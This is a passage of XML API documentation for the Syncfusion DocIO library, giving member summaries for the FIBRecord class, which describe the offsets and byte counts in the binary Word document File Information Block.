        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.clw">
            <summary>
            Number of fields in the array of longs
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.cbMac">
            <summary>
            file offset of last byte written to file + 1.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lProductCreated">
            <summary>
            contains the build date of the creator. 10695 indicates the creator program was compiled on Jan 6, 1995
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lProductRevised">
            <summary>
            contains the build date of the File's last modifier
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.ccpText">
            <summary>
            length of main document text stream
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.ccpFtn">
            <summary>
            length of footnote subdocument text stream
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.ccpHdr">
            <summary>
            length of header subdocument text stream
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.ccpMcr">
            <summary>
            length of macro subdocument text stream, which should now always be 0.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.ccpAtn">
            <summary>
            length of annotation subdocument text stream
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.ccpEdn">
            <summary>
            length of endnote subdocument text stream
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.ccpTxbx">
            <summary>
            length of textbox subdocument text stream
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.ccpHdrTxbx">
            <summary>
            length of header textbox subdocument text stream.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.pnFbpChpFirst">
            <summary>
            when there was insufficient memory for Word to expand the plcfbte at save time, the plcfbte is written to the file in a linked list of 512-byte pieces starting with this pn
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.pnChpFirst">
            <summary>
            the page number of the lowest numbered page in the document that records CHPX FKP information
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.cpnBteChp">
            <summary>
            count of CHPX FKPs recorded in file. In non-complex files if the number of entries in the plcfbteChpx is less than this, the plcfbteChpx is incomplete.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.pnFbpPapFirst">
            <summary>
            when there was insufficient memory for Word to expand the plcfbte at save time, the plcfbte is written to the file in a linked list of 512-byte pieces starting with this pn
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.pnPapFirst">
            <summary>
            the page number of the lowest numbered page in the document that records PAPX FKP information
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.cpnBtePap">
            <summary>
            count of PAPX FKPs recorded in file. In non-complex files if the number of entries in the plcfbtePapx is less than this, the plcfbtePapx is incomplete.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.pnFbpLvcFirst">
            <summary>
            when there was insufficient memory for Word to expand the plcfbte at save time, the plcfbte is written to the file in a linked list of 512-byte pieces starting with this pn
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.pnLvcFirst">
            <summary>
            the page number of the lowest numbered page in the document that records LVC FKP information
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.cpnBteLvc">
            <summary>
            count of LVC FKPs recorded in file. In non-complex files if the number of entries in the plcfbtePapx is less than this, the plcfbtePapx is incomplete.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcIslandFirst">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcIslandLim">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.cfclcb">
            <summary>
            Number of fields in the array of FC/LCB pairs.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcStshfOrig">
            <summary>
            file offset of original allocation for STSH in table stream. During fast save Word will attempt to reuse this allocation if STSH is small enough to fit.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbStshfOrig">
            <summary>
            count of bytes of original STSH allocation
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcStshf">
            <summary>
            offset of STSH in table stream.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbStshf">
            <summary>
            count of bytes of current STSH allocation
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcffndRef">
            <summary>
            offset in table stream of footnote reference PLCF of FRD structures. CPs in PLC are relative to main document text stream and give location of footnote references.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcffndRef">
            <summary>
            count of bytes of footnote reference PLC== 0 if no footnotes defined in document.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcffndTxt">
            <summary>
            offset in table stream of footnote text PLC. CPs in PLC are relative to footnote subdocument text stream and give location of beginnings of footnote text for corresponding references recorded in plcffndRef. No structure is stored in this plc. There will just be n+1 FC entries in this PLC when there are n footnotes
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcffndTxt">
            <summary>
            count of bytes of footnote text PLC. == 0 if no footnotes defined in document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfandRef">
            <summary>
            offset in table stream of annotation reference ATRD PLC. The CPs recorded in this PLC give the offset of annotation references in the main document.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfandRef">
            <summary>
            count of bytes of annotation reference PLC.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfandTxt">
            <summary>
            offset in table stream of annotation text PLC. The Cps recorded in this PLC give the offset of the annotation text in the annotation sub document corresponding to the references stored in the plcfandRef. There is a 1 to 1 correspondence between entries recorded in the plcfandTxt and the plcfandRef. No structure is stored in this PLC.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfandTxt">
            <summary>
            count of bytes of the annotation text PLC
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfsed">
            <summary>
            offset in table stream of section descriptor SED PLC. CPs in PLC are relative to main document.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfsed">
            <summary>
            count of bytes of section descriptor PLC.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcpad">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcpad">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfphe">
            <summary>
            offset in table stream of PHE PLC of paragraph heights. CPs in PLC are relative to main document text stream. Only written for files in complex format. Should not be written by third party creators of Word files.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfphe">
            <summary>
            count of bytes of paragraph height PLC. ==0 when file is non-complex.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbfglsy">
            <summary>
            offset in table stream of glossary string table. This table consists of Pascal style strings (strings stored prefixed with a length byte) concatenated one after another.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbSttbfglsy">
            <summary>
            count of bytes of glossary string table. == 0 for non-glossary documents.!=0 for glossary documents.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfglsy">
            <summary>
            offset in table stream of glossary PLC. CPs in PLC are relative to main document and mark the beginnings of glossary entries and are in 1-1 correspondence with entries of sttbfglsy. No structure is stored in this PLC. There will be n+1 FC entries in this PLC when there are n glossary entries.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfglsy">
            <summary>
            count of bytes of glossary PLC.== 0 for non-glossary documents.!=0 for glossary documents.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfhdd">
            <summary>
            byte offset in table stream of header HDD PLC. CPs are relative to header subdocument and mark the beginnings of individual headers in the header subdocument. No structure is stored in this PLC. There will be n+1 FC entries in this PLC when there are n headers stored for the document.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfhdd">
            <summary>
            count of bytes of header PLC.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfbteChpx">
            <summary>
            offset in table stream of character property bin table.PLC. FCs in PLC are file offsets in the main stream. Describes text of main document and all subdocuments.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfbteChpx">
            <summary>
            count of bytes of character property bin table PLC.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfbtePapx">
            <summary>
            offset in table stream of paragraph property bin table.PLC. FCs in PLC are file offsets in the main stream. Describes text of main document and all subdocuments.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfbtePapx">
            <summary>
            count of bytes of paragraph property bin table PLC
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfsea">
            <summary>
            offset in table stream of PLC reserved for private use. The SEA is 6 bytes long.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfsea">
            <summary>
            count of bytes of private use PLC.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbfffn">
            <summary>
            Offset in table stream of font information STTBF. 
            The sttbfffn is a STTBF where is string is actually an FFN 
            structure. The nth entry in the STTBF describes the font that 
            will be displayed when the chp.ftc for text is equal to n. 
            See the FFN file structure definition.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbSttbfffn">
            <summary>
            count of bytes in sttbfffn.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcffldMom">
            <summary>
            offset in table stream to the FLD PLC of field positions in the main document. The CPs point to the beginning CP of a field, the CP of field separator character inside a field and the ending CP of the field. A field may be nested within another field. 20 levels of field nesting are allowed.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcffldMom">
            <summary>
            count of bytes in plcffldMom
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcffldHdr">
            <summary>
            offset in table stream to the FLD PLC of field positions in the header subdocument.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcffldHdr">
            <summary>
            count of bytes in plcffldHdr
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcffldFtn">
            <summary>
            offset in table stream to the FLD PLC of field positions in the footnote subdocument.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcffldFtn">
            <summary>
            count of bytes in plcffldFtn
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcffldAtn">
            <summary>
            offset in table stream to the FLD PLC of field positions in the annotation subdocument.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcffldAtn">
            <summary>
            count of bytes in plcffldAtn
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcffldMcr">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcffldMcr">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbfbkmk">
            <summary>
            offset in table stream of the STTBF that records bookmark names in the main document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbSttbfbkmk">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfbkf">
            <summary>
            offset in table stream of the PLCF that records the beginning CP offsets of bookmarks in the main document. See BKF structure definition
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfbkf">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfbkl">
            <summary>
            offset in table stream of the PLCF that records the ending CP offsets of bookmarks recorded in the main document. No structure is stored in this PLCF.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfbkl">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcCmds">
            <summary>
            offset in table stream of the macro commands. These commands are private and undocumented.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbCmds">
            <summary>
            undocument size of undocument structure not documented above
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcmcr">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcmcr">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbfmcr">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbSttbfmcr">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPrDrvr">
            <summary>
            offset in table stream of the printer driver information (names of drivers, port, etc.)
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPrDrvr">
            <summary>
            count of bytes of the printer driver information (names of drivers, port, etc.)
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPrEnvPort">
            <summary>
            offset in table stream of the print environment in portrait mode.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPrEnvPort">
            <summary>
            count of bytes of the print environment in portrait mode.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPrEnvLand">
            <summary>
            offset in table stream of the print environment in landscape mode.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPrEnvLand">
            <summary>
            count of bytes of the print environment in landscape mode.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcWss">
            <summary>
            offset in table stream of Window Save State data structure. WSS contains dimensions of document's main text window and the last selection made by Word user.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbWss">
            <summary>
            count of bytes of WSS. ==0 if unable to store the window state. Should not be written by third party creators of Word files.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcDop">
            <summary>
            offset in table stream of document property data structure.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbDop">
            <summary>
            count of bytes of document properties.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbfAssoc">
            <summary>
            offset in table stream of STTBF of associated strings. The strings in this table specify document summary info and the paths to special documents related to this document. See documentation of the STTBFASSOC.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbSttbfAssoc">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcClx">
            <summary>
            offset in table stream of beginning of information for complex files. Consists of an encoding of all of the prms quoted by the document followed by the plcpcd (piece table) for the document.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbClx">
            <summary>
            count of bytes of complex file information == 0 if file is non-complex.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfpgdFtn">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfpgdFtn">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcAutosaveSource">
            <summary>
            offset in table stream of the name of the original file. fcAutosaveSource and cbAutosaveSource should both be 0 if autosave is off.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbAutosaveSource">
            <summary>
            count of bytes of the name of the original file.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcGrpXstAtnOwners">
            <summary>
            offset in table stream of group of strings recording the names of the owners of annotations stored in the document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbGrpXstAtnOwners">
            <summary>
            count of bytes of the group of strings
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbfAtnbkmk">
            <summary>
            offset in table stream of the sttbf that records names of bookmarks for the annotation subdocument
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbSttbfAtnbkmk">
            <summary>
            length in bytes of the sttbf that records names of bookmarks for the annotation subdocument
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcdoaMom">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcdoaMom">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcdoaHdr">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcdoaHdr">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcspaMom">
            <summary>
            offset in table stream of the FSPA PLC for main document. == 0 if document has no office art objects.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcspaMom">
            <summary>
            length in bytes of the FSPA PLC of the main document.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcspaHdr">
            <summary>
            offset in table stream of the FSPA PLC for header document. == 0 if document has no office art objects.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcspaHdr">
            <summary>
            length in bytes of the FSPA PLC of the header document.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfAtnbkf">
            <summary>
            offset in table stream of BKF (bookmark first) PLC of the annotation subdocument
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfAtnbkf">
            <summary>
            length in bytes of BKF (bookmark first) PLC of the annotation subdocument
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfAtnbkl">
            <summary>
            offset in table stream of BKL (bookmark last) PLC of the annotation subdocument
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfAtnbkl">
            <summary>
            length in bytes of PLC marking the CP limits of the annotation bookmarks. No structure is stored in this PLC.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPms">
            <summary>
            offset in table stream of PMS (Print Merge State) information block. This contains the current state of a print merge operation
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPms">
            <summary>
            length in bytes of PMS. ==0 if no current print merge state. Should not be written by third party creators of Word files.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcFormFldSttbs">
            <summary>
            offset in table stream of form field Sttbf which contains strings used in form field dropdown controls
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbFormFldSttbs">
            <summary>
            length in bytes of form field Sttbf
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfendRef">
            <summary>
            offset in table stream of endnote reference PLCF of FRD structures. CPs in PLCF are relative to main document text stream and give location of endnote references.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfendRef">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfendTxt">
            <summary>
            offset in table stream of PlcfendRef which points to endnote text in the endnote document stream which corresponds with the plcfendRef. No structure is stored in this PLC.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfendTxt">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcffldEdn">
            <summary>
            offset in table stream to FLD PLCF of field positions in the endnote subdoc
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcffldEdn">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfpgdEdn">
            <summary>
            not used
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfpgdEdn">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcDggInfo">
            <summary>
            offset in table stream of the office art object table data. The format of office art object table data is found in a separate document.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbDggInfo">
            <summary>
            length in bytes of the office art object table data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbfRMark">
            <summary>
            offset in table stream to STTBF that records the author abbreviations for authors who have made revisions in the document.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbSttbfRMark">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbCaption">
            <summary>
            offset in table stream to STTBF that records caption titles used in the document.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbSttbCaption">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbAutoCaption">
            <summary>
            offset in table stream to the STTBF that records the object names and indices into the caption STTBF for objects which get auto captions.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbSttbAutoCaption">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfwkb">
            <summary>
            offset in table stream to WKB PLCF that describes the boundaries of contributing documents in a master document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfwkb">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfspl">
            <summary>
            offset in table stream of PLCF (of SPLS structures) that records spell check state
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfspl">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcftxbxTxt">
            <summary>
            offset in table stream of PLCF that records the beginning CP in the text box subdoc of the text of individual text box entries. No structure is stored in this PLCF
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcftxbxTxt">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcffldTxbx">
            <summary>
            offset in table stream of the FLD PLCF that records field boundaries recorded in the textbox subdoc.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcffldTxbx">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcfhdrtxbxTxt">
            <summary>
            offset in table stream of PLCF that records the beginning CP in the header text box subdoc of the text of individual header text box entries. No structure is stored in this PLC.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcfhdrtxbxTxt">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPlcffldHdrTxbx">
            <summary>
            offset in table stream of the FLD PLCF that records field boundaries recorded in the header textbox subdoc.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPlcffldHdrTxbx">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcStwUser">
            <summary>
            Macro User storage
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbStwUser">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcSttbttmbd">
            <summary>
            offset in table stream of embedded true type font data.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.cbSttbttmbd">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcUnused">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbUnused">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPgdMother">
            <summary>
            offset in table stream of the PLF that records the page descriptors for the main text of the doc.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPgdMother">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcBkdMother">
            <summary>
            offset in table stream of the PLCF that records the break descriptors for the main text of the doc.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbBkdMother">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcPgdFtn">
            <summary>
            offset in table stream of the PLF that records the page descriptors for the footnote text of the doc.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbPgdFtn">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.fcBkdFtn">
            <summary>
            offset in table stream of the PLCF that records the break descriptors for the footnote text of the doc.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.FIBRecord.lcbBkdFtn">
            <summary>
            
            </summary>
        </member>
